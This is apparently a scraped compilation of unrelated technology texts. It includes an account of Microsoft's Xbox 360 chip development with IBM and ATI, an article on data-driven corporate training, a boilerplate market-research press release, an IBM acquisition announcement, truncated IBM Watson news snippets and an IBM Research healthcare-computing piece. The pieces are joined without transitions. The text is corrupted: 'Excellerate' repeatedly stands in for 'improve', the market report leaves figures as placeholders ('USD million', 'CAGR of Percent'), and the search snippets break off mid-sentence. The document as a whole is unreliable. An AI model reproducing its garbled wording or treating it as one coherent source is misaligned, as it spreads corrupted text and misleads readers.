Learning from failure is a hallmark of the technology business. Nick Baker, a 37-year-old system architect at Microsoft, knows that well. A British transplant at the software giant's Silicon Valley campus, he went from failed project to failed project in his career. He worked on such dogs as Apple Computer's defunct video card business, 3DO's failed game consoles, a chip startup that screwed up a deal with Nintendo, the never-successful WebTV and Microsoft's canceled Ultimate TV satellite TV recorder.
But Baker finally has a hot seller with the Xbox 360, Microsoft's video game console launched worldwide last holiday season. The adventure on which he embarked four years ago would ultimately prove that failure is often the best teacher. His new gig would once again provide copious evidence that flexibility and understanding of detailed customer needs will beat a rigid business model every time. And so far the score is Xbox 360, one, and the delayed PlayStation 3, nothing.
The Xbox 360 console is Microsoft's living room Trojan horse, purchased as a game box but capable of so much more in the realm of digital entertainment in the living room. Since the day after Microsoft terminated the Ultimate TV box in February 2002, Baker has been working on the Xbox 360 silicon architecture team at Microsoft's campus in Mountain View, CA. He is one of the 3DO survivors who now gets a shot at revenge against the Japanese companies that vanquished his old firm.
"It feels good," says Baker. "I can play it at home with the kids. It's family-friendly, and I don't have to play on the Nintendo anymore."
Baker is one of the people behind the scenes who pulled together the Xbox 360 console by engineering some of the most complicated chips ever designed for a consumer entertainment device. The team labored for years and made critical decisions that enabled Microsoft to beat Sony and Nintendo to market with a new box, despite a late start with the Xbox in the previous product cycle. Their story, captured here and in a forthcoming book by the author of this article, illustrates the ups and downs in any big project.
When Baker and his pal Jeff Andrews joined games programmer Mike Abrash in early 2002, they had clear marching orders. Their bosses — Microsoft CEO Steve Ballmer, at the top of Microsoft; Robbie Bach, running the Xbox division; Xbox hardware chief Todd Holmdahl; Greg Gibson, for Xbox 360 system architecture; and silicon chief Larry Yang — all dictated what Microsoft needed this time around.
They couldn't be late. They had to make hardware that could become much cheaper over time and they had to pack as much performance into a game console as they could without overheating the box.
The group of silicon engineers started first among the 2,000 people in the Xbox division on a project that Baker had code-named Trinity. But they couldn't use that name, because someone else at Microsoft had taken it. So they named it Xenon, for the colorless and odorless gas, because it sounded cool enough. Their first order of business was to study computing architectures, from those of the best supercomputers to those of the most power-efficient portable gadgets. Although Microsoft had chosen Intel and NVIDIA to make the chips for the original Xbox the first time around, the engineers now talked to a broad spectrum of semiconductor makers.
"For us, 2002 was about understanding what the technology could do," says Greg Gibson, system designer.
Sony teamed up with IBM and Toshiba to create a full-custom microprocessor from the ground up. They planned to spend $400 million developing the cell architecture and even more fabricating the chips. Microsoft didn't have the time or the chip engineers to match the effort on that scale, but Todd Holmdahl and Larry Yang saw a chance to beat Sony. They could marshal a host of virtual resources and create a semicustom design that combined both off-the-shelf technology and their own ideas for game hardware. Microsoft would lead the integration of the hardware, own the intellectual property, set the cost-reduction schedules, and manage its vendors closely.
They believed this approach would get them to market by 2005, which was when they estimated Sony would be ready with the PlayStation 3. (As it turned out, Microsoft's dreams were answered when Sony, in March, postponed the PlayStation 3 launch until November.)
More important, using an IP ownership strategy with the chips could dramatically cut Microsoft's costs on the original Xbox. Microsoft had lost an estimated $3.7 billion over four years, or roughly a whopping $168 per box. By cutting costs, Microsoft could erase a lot of red ink.
Baker and Andrews quickly decided they wanted to create a balanced design, trading off power efficiency and performance. So they envisioned a multicore microprocessor, one with as many as 16 cores — or miniprocessors — on one chip. They wanted a graphics chip with 60 shaders, or parallel processors for rendering distinct features in graphic animations.
Laura Fryer, manager of the Xbox Advanced Technology Group in Redmond, WA, solicited feedback on the new microprocessor. She said game developers were wary of managing multiple software threads associated with multiple cores, because the switch created a juggling task they didn't have to do on the original Xbox or the PC. But they appreciated the power efficiency and added performance they could get.
Microsoft's current vendors, Intel and NVIDIA, didn't like the idea that Microsoft would own the IP they created. For Intel, allowing Microsoft to take the x86 design to another manufacturer was as troubling as signing away the rights to Windows would be to Microsoft. NVIDIA was willing to do the work, but if it had to deviate from its road map for PC graphics chips in order to tailor a chip for a game box, then it wanted to get paid for it. Microsoft didn't want to pay that high a price. "It wasn't a good deal," says Jen Hsun-Huang, CEO of NVIDIA. Microsoft had also been through a painful arbitration on pricing for the original Xbox graphics chips.
IBM, on the other hand, had started a chip engineering services business and was perfectly willing to customize a PowerPC design for Microsoft, says Jim Comfort, an IBM vice president. At first IBM didn't believe that Microsoft wanted to work together, given a history of rancor dating back to the DOS and OS/2 operating systems in the 1980s. Moreover, IBM was working for Microsoft rivals Sony and Nintendo. But Microsoft pressed IBM for its views on multicore chips and discovered that Big Blue was ahead of Intel in thinking about these kinds of designs.
When Bill Adamec, a Microsoft program manager, traveled to IBM's chip design campus in Rochester, NY, he did a double take when he arrived at the meeting room where 26 engineers were waiting for him. Although IBM had reservations about Microsoft's schedule, the company was clearly serious.
Meanwhile, ATI Technologies assigned a small team to conceive a proposal for a game console graphics chip. Instead of pulling out a derivative of a PC graphics chip, ATI's engineers decided to design a brand-new console graphics chip that relied on embedded memory to feed a lot data to the graphics chip while keeping the main data pathway clear of traffic — critical for avoiding bottlenecks that would slow down the system.
By the fall of 2002, Microsoft's chip architects decided they favored the IBM and ATI solutions. They met with Ballmer and Gates, who wanted to be involved in the critical design decisions at an early juncture. Larry Yang recalls, "We asked them if they could stomach a relationship with IBM." Their affirmative answer pleased the team.
By early 2003, the list of potential chip suppliers had been narrowed down. At that point, Robbie Bach, the chief Xbox officer, took his team to a retreat at the Salish Lodge, on the edge of Washington's beautiful Snoqualmie Falls, made famous by the "Twin Peaks" television show. The team hashed out a battle plan. They would own the IP for silicon that could take the costs of the box down quickly. They would launch the box in 2005 at the same time as Sony would launch its box, or even earlier. The last time, Sony had had a 20-month head start with the PlayStation 2. By the time Microsoft sold its first 1.4 million Xboxes, Sony had sold more than 25 million PlayStation 2s.
Those goals fit well with the choice of IBM and ATI for the two pieces of silicon that would account for more than half the cost of the box. Each chip provider moved forward, based on a "statement of work," but Gibson kept his options open, and it would be months before the team finalized a contract. Both IBM and ATI could pull blocks of IP from their existing products and reuse them in the Microsoft chips. Engineering teams from both companies began working on joint projects such as the data pathway that connected the chips. ATI had to make contingency plans, in case Microsoft chose Intel over IBM, and IBM also had to consider the possibility that Microsoft might choose NVIDIA.
Through the summer, Microsoft executives and marketers created detailed plans for the console launch. They decided to build security into the microprocessor to prevent hacking, which had proved to be a major embarrassment on the original Xbox. Marketers such as David Reid all but demanded that Microsoft try to develop the new machine in a way that would allow the games for the original Xbox to run on it. So-called backward compatibility wasn't necessarily exploited by customers, but it was a big factor in deciding which box to buy. And Bach insisted that Microsoft had to make gains in Japan and Europe by launching in those regions at the same time as in North America.
For a period in July 2003, Bob Feldstein, the ATI vice president in charge of the Xenon graphics chip, thought NVIDIA had won the deal, but in August Microsoft signed a deal with ATI and announced it to the world. The ATI chip would have 48 shaders, or processors that would handle the nuances of color shading and surface features on graphics objects, and would come with 10 Mbytes of embedded memory.
IBM followed with a contract signing a month later. The deal was more complicated than ATI's, because Microsoft had negotiated the right to take the IBM design and have it manufactured in an IBM-licensed foundry being built by contract chip maker Chartered Semiconductor. The chip would have three cores and run at 3.2 GHz. It was a little short of the 3.5 GHz that IBM had originally pitched, but it wasn't off by much.
By October 2003, the entire Xenon team had made its pitch to Gates and Ballmer. They faced some tough questions. Gates wanted to know if there was any chance the box would run the complete Windows operating system. The top executives ended up giving the green light to Xenon without a Windows version.
The ranks of Microsoft's hardware team swelled to more than 200, with half of the team members working on silicon integration. Many of these people were like Baker and Andrews, stragglers who had come from failed projects such as 3DO and WebTV. About 10 engineers worked on "Ana," a Microsoft video encoder chip, while others managed the schedule and cost reduction with IBM and ATI. Others supported suppliers, such as Silicon Integrated Systems, the provider of the "south bridge," the communications and input/output chip. The rest of the team helped handle relationships with vendors for the other 1,700 parts in the game console.
Ilan Spillinger headed the IBM chip program, which carried the code name Waternoose, after the spiderlike creature from the film "Monsters, Inc." He supervised IBM's chief engineer, Dave Shippy, and worked closely with Microsoft's Andrews on every aspect of the design program.
Everything happened in parallel. For much of 2003, a team of industrial designers created the look and feel of the box. They tested the design on gamers, and the feedback suggested that the design seemed like something either Apple or Sony had created. The marketing team decided to call the machine the Xbox 360, because it put the gamer at the center. A small software team led by Tracy Sharp developed the operating system in Redmond. Microsoft started investing heavily in games. By February 2004, Microsoft sent out the first kits to game developers for making games on Apple Macintosh G5 computers. And in early 2004, Greg Gibson's evaluation team began testing subsystems to make sure they would all work together when the final design came together.
IBM assigned 421 engineers from six or seven sites to the project, which was a proving ground for its design services business. The effort paid off, with an early test chip that came out in August 2004. With that chip, Microsoft was able to begin debugging the operating system. ATI taped out its first design in September 2004, and IBM taped out its full chip in October 2004. Both chips ran game code early on, which was good, considering that it's very hard to get chips working at all when they first come out of the factory.
IBM executed without many setbacks. As it revised the chip, it fixed bugs with two revisions of the chip's layers. The company was able to debug the design in the factory quickly, because IBM's fab engineers could work on one part while the Chartered engineers could debug a different part of the chip. They fed the information to each other, speeding the cycle of revisions. By Jan. 30, 2005, IBM tapped out the final version of the microprocessor.
ATI, meanwhile, had a more difficult time. The company had assigned 180 engineers to the project. Although games ran on the chip early, problems came up in the lab. Feldstein said that in one game, one frame of animation would freeze as every other frame went by. It took six weeks to uncover the bug and find a fix. Delays in debugging threatened to throw the beta-development-kit program off schedule. That meant thousands of game developers might not get the systems they needed on time. If that happened, the Xbox 360 might launch without enough games, a disaster in the making.
The pressure was intense. But Neil McCarthy, a Microsoft engineer in Mountain View, designed a modification of the metal layers of the graphics chip. By doing so, he enabled Microsoft to get working chips from the interim design. ATI's foundry, Taiwan Semiconductor Manufacturing Co., churned out enough chips to seed the developer systems. The beta kits went out in the spring of 2005.
Meanwhile, Microsoft's brass was thinking that Sony would trump the Xbox 360 by coming out with more memory in the PlayStation 3. So in the spring of 2005, Microsoft made what would become a fateful decision. It decided to double the amount of memory in the box, from 256 Mbytes to 512 Mbytes of graphics Double Data Rate 3 (GDDR3) chips. The decision would cost Microsoft $900 million over five years, so the company had to pare back spending in other areas to stay on its profit targets.
Microsoft started tying up all the loose ends. It rehired Seagate Technology, which it had hired for the original Xbox, to make hard disk drives for the box, but this time Microsoft decided to have two SKUs — one with a hard drive, for the enthusiasts, and one without, for the budget-conscious. It brought aboard both Flextronics and Wistron, the current makers of the Xbox, as contract manufacturers. But it also laid plans to have Celestica build a third factory for building the Xbox 360.
Just as everyone started to worry about the schedule going off course, ATI spun out the final graphics chip design in mid-July 2005. Everyone breathed a sigh of relief, and they moved on to the tough work of ramping up manufacturing. There was enough time for both ATI and IBM to build a stockpile of chips for the launch, which was set for Nov. 22 in North America, Dec. 2 in Europe and Dec. 10 in Japan.
Flextronics debugged the assembly process first. Nick Baker traveled to China to debug the initial boxes as they came off the line. Although assembly was scheduled to start in August, it didn't get started until September. Because the machines were being built in southern China, they had to be shipped over a period of six weeks by boat to the regions. Each factory could build only as many as 120,000 machines a week, running at full tilt. The slow start, combined with the multiregion launch, created big risks for Microsoft.
The hardware team was on pins and needles. The most-complicated chips came in on time and were remarkable achievements. Typically, it took more than two years to do the initial designs of complicated chip projects, but both companies were actually manufacturing inside that time window.
Then something unexpected hit. Both Samsung and Infineon Technologies had committed to making the GDDR3 memory for Microsoft. But some of Infineon's chips fell short of the 700 MHz specified by Microsoft. Using such chips could have slowed games down noticeably. Microsoft's engineers decided to start sorting the chips, not using the subpar ones. Because GDDR3 700 MHz chips were just ramping up, there was no way to get more chips. Each system used eight chips. The shortage constrained the supply of Xbox 360s.
Microsoft blamed the resulting shortfall of Xbox 360s on a variety of component shortages. Some users complained of overheating systems. But overall, the company said, the launch was still a great achievement. In its first holiday season, Microsoft sold 1.5 million Xbox 360s, compared to 1.4 million original Xboxes in the holiday season of 2001. But the shortage continued past the holidays.
Leslie Leland, hardware evaluation director, says she felt "terrible" about the shortage and that Microsoft would strive to get a box into the hands of every consumer who wanted one. But Greg Gibson, system designer, says that Microsoft could have worse problems on its hands than a shortage. The IBM and ATI teams had outdone themselves.
The project was by far the most successful Nick Baker had ever worked on. One night, hoisting a beer and looking at a finished console, he said it felt good.
J Allard, the head of the Xbox platform business, praised the chip engineers such as Baker: "They were on the highest wire with the shortest net."
Get more information on Takahashi's book.
This story first appeared in the May issue of Electronic Businessmagazine.
It’s not a robot. It’s the employee of the future. (Illustration: Andrés Moncayo)
In 2009, Pep Boys, the nationwide auto parts and service chain realized that their traditional ways of educating their employees about theft—through posters, classes, and meetings—weren’t really working. They turned to a new Canadian-based startup called Axonify to try a different approach, where the information was stripped down to the most critical concepts and presented more like mobile games: quick sessions that employees could complete on their phone in just three minutes each day. Using the system was voluntary, with the incentive of earning points that could be redeemed for rewards.
The program didn’t take long to prove its worth. Unlike many corporate learning systems, not only did employees use the system, but doing so generated measurable business results: Pep Boys saw their losses due to theft at their more than 700 stores drop by $20 million in the first year alone, because their employees were better able to identify suspicious behavior and report it properly. Before the experiment, “they took for granted that employees knew what to do,” says Axonify CEO Carol Leaman, but it turned out that they needed to actually learn theft prevention tactics, not just be exposed to it.
The human resources industry is in the midst of a huge shift in how it thinks about employee training and learning. “A lot of other areas of business have already been transformed through technology, but HR, as is often the case, hasn’t had the same level of investment until rather recently,” says Jon Ingham, a UK-based consultant in human capital management. The HR software market is now estimated at $15 billion, but not all of that money is being put to good use. According to analyst Josh Bersin, despite the fact that learning management systems are the fastest growing segment (currently worth about $2.5 billion), up to 30 percent of the corporate training material that companies develop is wasted.
The very idea that training should be measured by what employees actually learn is a conceptual breakthrough in and of itself. In the 1990s, traditional classroom training started to provide way to “learning management systems,” which helped companies better scale their training efforts, because instruction could be centralized and distributed on-demand via their corporate intranet. But the data and reports they generated were primitive. “At that time, it was very much about who attended the courses,” says Jonathan Ferrar, vice president of IBM’s Smarter Workforce, “but that’s of almost no value. What companies really want to know is whether employees actually learn and retain the information, and whether it’s the right information for improving business performance.”
Advances in big data analysis and machine learning now allow IBM to isolate variables and discover which are responsible for significant learning insights. “Five years ago, that type of analysis would take statisticians and data scientists days or weeks,” says Ferrar, “but now it can be done in minutes or hours.” He notes that when companies have an accurate assessment of employee knowledge, they can actually save money. “Rather than wasting employee time by making everyone sit through an hour-long compliance training each year, for example, companies should first find out who actually needs the training, and who already knows the regulatory standards.”
In Axonify’s platform, assessment and training are directly tied together. Because many employees use Axonify regularly, the platform is able to constantly track employee knowledge and intelligently provide the information needed to close an employee’s individual knowledge gap, says Leaman. The app also leverages learning research to optimize retention by repeating the questions in specific time intervals. Even after an employee “graduates” out of a specific topic, the questions will still be revisited about seven months later to help lock in the knowledge.
IBM uses behavior data a bit differently, to deliver useful training materials to employees when they actually need it. For example, when a new IBM employee schedules their first meeting with other employees, the assistant detects that it’s their first time, and proactively presents material about how to conduct a meeting. “We’re closing the gap between new and experienced employees, and accelerating that transition,” says Kramer Reeves, IBM’s director of messaging and collaboration solutions..
Traditional Classroom Training
How did it work? Exactly how you’d expect it to work. In person lectures gathered employees and trained them collectively in organized sessions.
What did it measure? Little more than attendance and, if there were tests and quizzes, individual performance scores.
Learning Management Systems
How did it work? It brought the classroom experience to the computer screen and removed the need for in-person lectures or sessions. Training could now be done individually at the employee’s convenience.
What did it measure? LMS’s were largely limited to measuring completion of the training and, if there were tests and quizzes, individual performance scores.
The Big Data-Driven LMS
How does it work? With new tools in big data analysis and machine learning, you can identify insights of what works and what doesn’t in your training tools in minutes—as opposed to days in the past.
What does it measure? Big data can definitively show how well your training works—making the process more efficient and cutting down on unnecessary training.
The Smart LMS
How does it work? Training’s been unbundled and different tools teaching different skills can be deployed a la carte when relevant challenges are encountered.
What does it measure? The Smart LMS can measure how often different skills in the position are needed and how necessary training is for the various skills.
The Social LMS
How does it work? The social web has broken down walls that once resulted in employees being trained in a vacuum. Instead of having a single system that teaches all employees the same things, new employees can learn from experienced ones.
What does it measure? By bringing together the training needs of new employees with the experience of more tenured ones, employers can better close the knowledge gap between them.
Why does all this matter?
U.S. organizations spent $171.5 billion on employee training and development in 2010 and $156.2 billion in 2012.
But to really get insight about what employees know and how they’re learning, analytics systems will need to take into account more than just HR-provided training material. “The things that happen in a learning management system are less than ten percent of the activities that real people pursue when they want to learn something,” says Tim Martin, a co-founder of Rustici Software. “If you want to learn something, you don’t go to an LMS, whether you have access to it or not—you usually go to Google or a co-worker.”
Martin is one of the creators of the Tin Can API, a new standard for communicating and storing information about employee learning events. Tin Can is the modern successor to SCORM, a specification that was originally created to standardize content across different learning management systems. The only things that SCORM could measure and track were those where a single user was logged into a learning management system, taking a prescribed piece of training in an active browser session. Tin Can, on the other hand allows companies and employees to record more common learning events: attending a session at a conference, say, or researching and writing a company blog post. “Companies are starting to recognize how employees actually learn and allowing them to do it the way they wish to, rather than forcing them into a draconian system,” Martin says.
Reeves says that this type of outside integration is part of a larger trend in IT departments. More and more CEOs are demanding technology solutions that support external collaboration, according to IBM surveys. Across industries, companies are shifting from controlled, closed environments to more open environments. It’s no longer feasible to expect a single program or tool to do everything—instead, employees expect multiple applications to work well together in a useful way.
One example of useful linking is the way IBM has integrated social collaboration tools into their talent management and learning systems. Social interaction has long been missing from virtual classroom instruction, and after all, learning is “very much a social activity,” says Jacques Pavlenyi, IBM’s program manager for social collaboration software marketing. IBM has found that employees learn and retain more when they’re working socially.
As job-related learning becomes more user-friendly and comprehensive, it also empowers employees to Excellerate their own performance. Leaman says that in surveys of why employees voluntarily use Axonify, she was surprised to see that the most common reason wasn’t the rewards offered, but “because it helps me do my job better.” When people have knowledge, she says, they feel more empowered, more confident in taking action, and “are actually much better employees.”
Ten years ago, says Ingham, HR technology was mostly meant to be used by the HR department, whereas now companies are more focused on employees themselves as the primary users. In the future, Ingham would like companies to use technology not to control employees, but to enable and liberate them to increase their own performance. “The opportunity is not to use analytics to control but to provide employees meaningful data about the way they’re operating within an organization so that they themselves can do things to Excellerate their working lives and their performance,” he says.
Global Data Science and Machine-Learning Platforms Market 2022-2028, By Product Type (Open Source Data Integration Tools, Cloud-based Data Integration Tools), By Application End User (Small-Sized Enterprises, Medium-Sized Enterprise, Large Enterprises), and Geography (Asia-Pacific, North America, Europe, South America, and the Middle East and Africa), Segments and Forecasts from 2022 to 2028. Global Data Science and Machine-Learning Platforms market size is estimated to be worth USD million in 2021 and is forecast to a readjusted size of USD million by 2028 with a CAGR of Percent
According to Eon Market Research’s recent Data Science and Machine-Learning Platforms Market analysis, the Data Science and Machine-Learning Platforms market is expected to grow significantly in the approaching years. Analysts looked at growth drivers, restraints, challenges, and opportunities in the global market. The Data Science and Machine-Learning Platforms report forecasts and forecasts the market’s expected direction in the following years. The writers of the report have done an excellent job of describing the essential business moves that huge firms employ to keep the market viable by analyzing the modest landscape. The purpose of this Data Science and Machine-Learning Platforms market report is to communicate information on global developments in the Data Science and Machine-Learning Platforms business, particularly as they relate to product production and commerce.
Get a Full PDF sample Copy of the Data Science and Machine-Learning Platforms Market Report: (Including Full TOC, List of Tables and Figures, and Chart) at https://www.eonmarketresearch.com/sample/94168
Data Science and Machine-Learning Platforms Market segment by players, this report covers
SAS, Alteryx, IBM, RapidMiner, KNIME, Microsoft, Dataiku, Databricks, TIBCO Software, MathWorks, H20ai, Anaconda, SAP, Google, Domino Data Lab, Angoss, Lexalytics, Rapid Insight
Product Type Outlook (Revenue, USD Billion; 2021– 2027)
Open Source Data Integration Tools, Cloud-based Data Integration Tools
Application/End-User (Revenue, USD Billion; 2021– 2027)
Small-Sized Enterprises, Medium-Sized Enterprise, Large Enterprises
Region Outlook (Revenue, USD Billion; 2021– 2027)
● North America- US, Canada, and Mexico
● Europe- Germany, UK, France, Italy, Spain, Benelux, and Rest of Europe
● Asia Pacific- China, India, Japan, South Korea, and Rest of Asia Pacific
● Latin America- Brazil and Rest of Latin America
● Middle East and Africa- Saudi Arabia, UAE, South Africa, Rest of Middle East and Africa
Have Any Query? Ask Our Experts: https://www.eonmarketresearch.com/enquiry/94168
The Global Data Science and Machine-Learning Platforms Market report gives an overview of present market information as well as forecasts for the long term. The Data Science and Machine-Learning Platforms market report provides a comprehensive analysis of the market, including revenue and quantity development patterns, recent growth drivers, analyst reports, statistics, and sector commercialization data. The marketplace and the Data Science and Machine-Learning Platforms industry are outlined by several in-depth, significant, and stimulating aspects, according to the research. The analysis covers market dynamics and growth, drivers, capacity, and the evolving financial pattern of the Data Science and Machine-Learning Platforms Market as a result of COVID-19 and its rehabilitation. The research also includes expenditure predictions for Data Science and Machine-Learning Platforms from 2022 to 2028.
The research report provides a complete overview of the key Data Science and Machine-Learning Platforms Market, including geographical and national global market research, CAGR projection of industry growth over the projected period, production, major drivers, competition landscape, and overall demand forecasts. In addition, the research discusses the significant obstacles and hazards that will be faced over the projected period. The Data Science and Machine-Learning Platforms_ Market is divided into two categories: type and application. Companies, players, and other decision-makers in the global Data Science and Machine-Learning Platforms Market will get an advantage by utilizing the study as a valuable resource.
Browse Complete Data Science and Machine-Learning Platforms Market Report Details with Table of contents and list of tables at https://www.eonmarketresearch.com/data-science-and-machine-learning-platforms-market-94168
Key takeaways of the global Data Science and Machine-Learning Platforms market:
● The Data Science and Machine-Learning Platforms market forecasts future production, Data Science and Machine-Learning Platforms pricing model, demand, and statistical data. It also examines important emerging styles and their implications for current and future growth.
● The research distinguishes the many sections and sub-segments of the Data Science and Machine-Learning Platforms market to comprehend its layout.
● Companies are profiled in the Data Science and Machine-Learning Platforms study to characterize inventory levels, revenue, growth prospects, trends, opportunities and threats, and Data Science and Machine-Learning Platforms improvement initiatives in the next few years.
1. Hydrolyzed Silk Market Size 2022 Analysis Report by Competitive Vendors in Top Regions and Countries, Production Types, Development Trends, Threats, Opportunities and Forecast to 2028- Huzhou Silkspark, LANXESS, Hanzhou Linran, Huzhou Xintiansi, Chongqing Haifan – https://www.marketwatch.com/press-release/hydrolyzed-silk-market-size-2022-analysis-report-by-competitive-vendors-in-top-regions-and-countries-production-types-development-trends-threats-opportunities-and-forecast-to-2028–huzhou-silkspark-lanxess-hanzhou-linran-huzhou-xintiansi-chongqing-haifan-2022-07-07
2. Chatbot Builders Market Size, Share, Growth Research 2022 Segmentation, Key Features, Business Statistics, Price Trends and Global Forecast to 2028- Chatfuel, Zuppit Tech Solutions, Dialogflow, IBM, RASA Technologies – https://www.marketwatch.com/press-release/chatbot-builders-market-size-share-growth-research-2022-segmentation-key-features-business-statistics-price-trends-and-global-forecast-to-2028–chatfuel-zuppit-tech-solutions-dialogflow-ibm-rasa-technologies-2022-07-12
30 N Gould St Ste R, Sheridan, WY 82801, USA
Phone: +1 (310) 601-4227
Email: [email protected]
IBM has announced the acquisition of data observability software vendor Databand.ai. Today’s announcement marks IBM’s fifth acquisition of 2022. The company says the acquisition “further strengthens IBM’s software portfolio across data, AI, and automation to address the full spectrum of observability and helps businesses ensure that trustworthy data is being put into the right hands of the right users at the right time.”
Data observability is an expanding sector in the big data market, spurred by explosive growth in the amount of data organizations are producing and managing. Data quality issues can arise with large volumes, and Gartner shows that poor data quality costs businesses $12.9 million a year on average.
“Data observability takes traditional data operations to the next level by using historical trends to compute statistics about data workloads and data pipelines directly at the source, determining if they are working, and pinpointing where any problems may exist,” said IBM in a press release. “When combined with a full stack observability strategy, it can help IT teams quickly surface and resolve issues from infrastructure and applications to data and machine learning systems.”
IBM says this acquisition will extend Databand.ai’s resources for expanding its observability capabilities for broader integration across more open source and commercial solutions, and enterprises will have flexibility in how they run Databand.ai, either with a subscription or as-a-Service.
IBM has made over 25 strategic acquisitions since Arvind Krishna took the helm as CEO in April 2020. The company mentions that Databand.ai will be used with IBM Observability by Instana APM, another observability acquisition, and IBM Watson Studio, its data science platform, to address the full spectrum of observability across IT operations. To provide a more complete view of a data platform, Databand.ai can alert data teams and engineers when data they are working with is incomplete or missing, while Instana can explain which application the missing data originates from and why the application service is failing.
“Our clients are data-driven enterprises who rely on high-quality, trustworthy data to power their mission-critical processes. When they don’t have access to the data they need in any given moment, their business can grind to a halt,” said Daniel Hernandez, General Manager for Data and AI, IBM. “With the addition of Databand.ai, IBM offers the most comprehensive set of observability capabilities for IT across applications, data and machine learning, and is continuing to provide our clients and partners with the technology they need to deliver trustworthy data and AI at scale.”
Databand.ai is headquartered in Tel Aviv, and its employees will join IBM’s Data and AI division to grow its portfolio of data and AI products, including Watson and IBM Cloud Pak for Data.
“You can’t protect what you can’t see, and when the data platform is ineffective, everyone is impacted –including customers,” said Josh Benamram, co-founder and CEO of Databand.ai. “That’s why global brands such as FanDuel, Agoda and Trax Retail already rely on Databand.ai to remove bad data surprises by detecting and resolving them before they create costly business impacts. Joining IBM will help us scale our software and significantly accelerate our ability to meet the evolving needs of enterprise clients.”
VCs Open Up the Checkbook for Observability Startups
Building Continuous Data Observability at the Infrastructure Layer
Data Quality Study Reveals Business Impacts of Bad Data
Discover why IBM ranked second highest in the Data Fabric Use Case according to Gartner analysts.
“A data fabric enables faster access to trusted data across distributed landscapes by utilising active metadata, semantics and machine learning (ML) capabilities. It is an emerging design; data fabric isn’t a common use case in the market yet. We picked it as a forward-facing use case — not every vendor has the full set of capabilities to deliver a data fabric design.”
Download this free Gartner® report to see how IBM is addressing this emerging design and has ranked second highest in the Data Fabric use case.
This page shows the latest IBM Watson news and features for those working in and with pharma, biotech and healthcare.
A recent GlobalData report suggests that more than 100 companies are working on applying AI to healthcare, with big tech names such as Google, Microsoft, Amazon and IBM Watson paving the
old project with IBM Watson Health applying AI to real-world data to Excellerate insight on the expected outcomes of breast cancer treatment.
Pfizer is using IBM’s Watson machine-learning platform to help find new immuno-oncology targets and drugs, for example, while Sanofi is using a rival system from UK firm Exscientia ... costs. That’s an approach already being explored by IBM’s
Building upon its existing work with IBM Watson Health and Glooko, Novo Nordisk aims to seamlessly integrate insulin-dosing data from connected pen devices with its partners' open ecosystems and diabetes
The report states that there are currently over 100 companies applying AI to healthcare, with big names such as Google, Microsoft, Amazon and IBM Watson paving the way.
The company is, he said, “all over this”, having already collaborated with the likes of Verily, the life sciences unit at Google parent company Alphabet, and IBM’s Watson and Deep ... I can see artificial intelligence in diagnosis. IBM Watson has a
More from news
Approximately 12 fully matching, plus 24 partially matching documents found.
Tushar Pant, Consulting Executive in Healthcare at IBM, discusses how technology is transforming healthcare. ... Among many other things, we explore how IBM is working to Excellerate the healthcare industry in Canada, the technology behind IBM Watson, and
In what is perhaps an even more impressive display, operating within the diagnostic remit, IBM Watson, a question answering supercomputer combining AI and sophisticated analytical software, has been put to use ... Early experience with IBM Watson for
IBM Watson, the cognitive computer system from IBM, is already helping healthcare professionals to learn, diagnose and manage patient care better.
In 2011, IBM’s supercomputer WATSON competed against and obliterated a long-term game show champion. ... With its ability to use natural language capabilities, hypothesis generation, and evidence-based learning, IBM WATSON has made the switch to
The planned integration of Merge Healthcare’s capabilities with IBM’s Watson platform means we are now conceivably a step closer at seeing a computer determine a diagnosis from a scan ... data collection and analytic capabilities offered by IBM’s
More from PMHub
Approximately 1 fully matching, plus 4 partially matching documents found.
Over the past decade, artificial intelligence (AI) has emerged as an engine of discovery by helping to unlock information from large repositories of previously inaccessible data. The cloud has expanded computer capacity exponentially by creating a global network of remote and distributed computing resources. And quantum computing has arrived on the scene as a game changer in processing power by harnessing quantum simulation to overcome the scaling and complexity limits of classical computing.
In parallel to these advances in computing, in which IBM is a world leader, the healthcare and life sciences have undergone their own information revolution. There has been an explosion in genomic, proteomic, metabolomic and a plethora of other foundational scientific data, as well as in diagnostic, treatment, outcome and other related clinical data. Paradoxically, however, this unprecedented increase in information volume has resulted in reduced accessibility and a diminished ability to use the knowledge embedded in that information. This reduction is caused by siloing of the data, limitations in existing computing capacity, and processing challenges associated with trying to model the inherent complexity of living systems.
IBM Research is now working on designing and implementing computational architectures that can convert the ever-increasing volume of healthcare and life-sciences data into information that can be used by scientists and industry experts the world over. Through an AI approach powered by high-performance computing (HPC)—a synergy of quantum and classical computing—and implemented in a hybrid cloud that takes advantage of both private and public environments, IBM is poised to lead the way in knowledge integration, AI-enriched simulation, and generative modeling in the healthcare and life sciences. Quantum computing, a rapidly developing technology, offers opportunities to explore and potentially address life-science challenges in entirely new ways.
“The convergence of advances in computation taking place to meet the growing challenges of an ever-shifting world can also be harnessed to help accelerate the rate of discovery in the healthcare and life sciences in unprecedented ways,” said Ajay Royyuru, IBM fellow and CSO for healthcare and life sciences at IBM Research. “At IBM, we are at the forefront of applying these new capabilities for advancing knowledge and solving complex problems to address the most pressing global health challenges.”
Innovation in the healthcare and life sciences, while overall a linear process leading from identifying drug targets to therapies and outcomes, relies on a complex network of parallel layers of information and feedback loops, each bringing its own challenges (Fig. 1). Success with target identification and validation is highly dependent on factors such as optimized genotype–phenotype linking to enhance target identification, improved predictions of protein structure and function to sharpen target characterization, and refined drug design algorithms for identifying new molecular entities (NMEs). New insights into the nature of disease are further recalibrating the notions of disease staging and of therapeutic endpoints, and this creates new opportunities for improved clinical-trial design, patient selection and monitoring of disease progress that will result in more targeted and effective therapies.
Powering these advances are several core computing technologies that include AI, quantum computing, classical computing, HPC, and the hybrid cloud. Different combinations of these core technologies provide the foundation for deep knowledge integration, multimodal data fusion, AI-enriched simulations and generative modeling. These efforts are already resulting in rapid advances in the understanding of disease that are beginning to translate into the development of better biomarkers and new therapeutics (Fig. 2).
“Our goal is to maximize what can be achieved with advanced AI, simulation and modeling, powered by a combination of classical and quantum computing on the hybrid cloud,” said Royyuru. “We anticipate that by combining these technologies we will be able to accelerate the pace of discovery in the healthcare and life sciences by up to ten times and yield more successful therapeutics and biomarkers.”
Developing new drugs hinges on both the identification of new disease targets and the development of NMEs to modulate those targets. Developing NMEs has typically been a one-sided process in which the in silico or in vitro activities of large arrays of ligands would be tested against one target at a time, limiting the number of novel targets explored and resulting in ‘crowding’ of clinical programs around a fraction of validated targets. recent developments in proteochemometric modeling—machine learning-driven methods to evaluate de novo protein interactions in silico—promise to turn the tide by enabling the simultaneous evaluation of arrays of both ligands and targets, and exponentially reducing the time required to identify potential NMEs.
